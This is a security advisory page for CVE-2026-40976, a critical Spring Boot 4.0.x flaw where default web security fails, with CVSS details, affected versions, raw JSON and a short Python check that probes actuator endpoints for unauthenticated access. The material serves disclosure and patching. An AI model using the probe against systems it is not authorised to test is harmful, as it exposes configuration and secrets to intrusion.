Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-40976 CVSS 9.1 CRITICAL

CVE-2026-40976

Published: 2026-04-28 00:16:25
Last Modified: 2026-04-30 13:54:13
Source: [email protected]

Description

In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of its own and rely on the default web security filter chain; depend on spring-boot-actuator-autoconfigure; not depend on spring-boot-health. If any of the above does not apply, the application is not vulnerable. Affected: Spring Boot 4.0.0–4.0.5; upgrade to 4.0.6 or later per vendor advisory.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:* - VULNERABLE
Spring Boot 4.0.0
Spring Boot 4.0.1
Spring Boot 4.0.2
Spring Boot 4.0.3
Spring Boot 4.0.4
Spring Boot 4.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-40976 # Checks if sensitive endpoints are accessible without authentication target = "http://127.0.0.1:8080" endpoints = ["/actuator/env", "/actuator/beans", "/manage"] for endpoint in endpoints: url = target + endpoint try: r = requests.get(url, timeout=5) if r.status_code == 200: print(f"[+] Potential Vulnerability found at {url}") print(f"[+] Content snippet: {r.text[:100]}") elif r.status_code == 401 or r.status_code == 403: print(f"[-] {url} is protected (Status: {r.status_code})") else: print(f"[?] {url} returned status {r.status_code}") except Exception as e: print(f"Error connecting to {url}: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40976", "sourceIdentifier": "[email protected]", "published": "2026-04-28T00:16:24.803", "lastModified": "2026-04-30T13:54:12.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of its own and rely on the default web security filter chain; depend on spring-boot-actuator-autoconfigure; not depend on spring-boot-health. If any of the above does not apply, the application is not vulnerable.\n\nAffected: Spring Boot 4.0.0–4.0.5; upgrade to 4.0.6 or later per vendor advisory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.0.6", "matchCriteriaId": "12A166C5-8B55-4BA3-AA8B-6024A257D441"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-40976", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.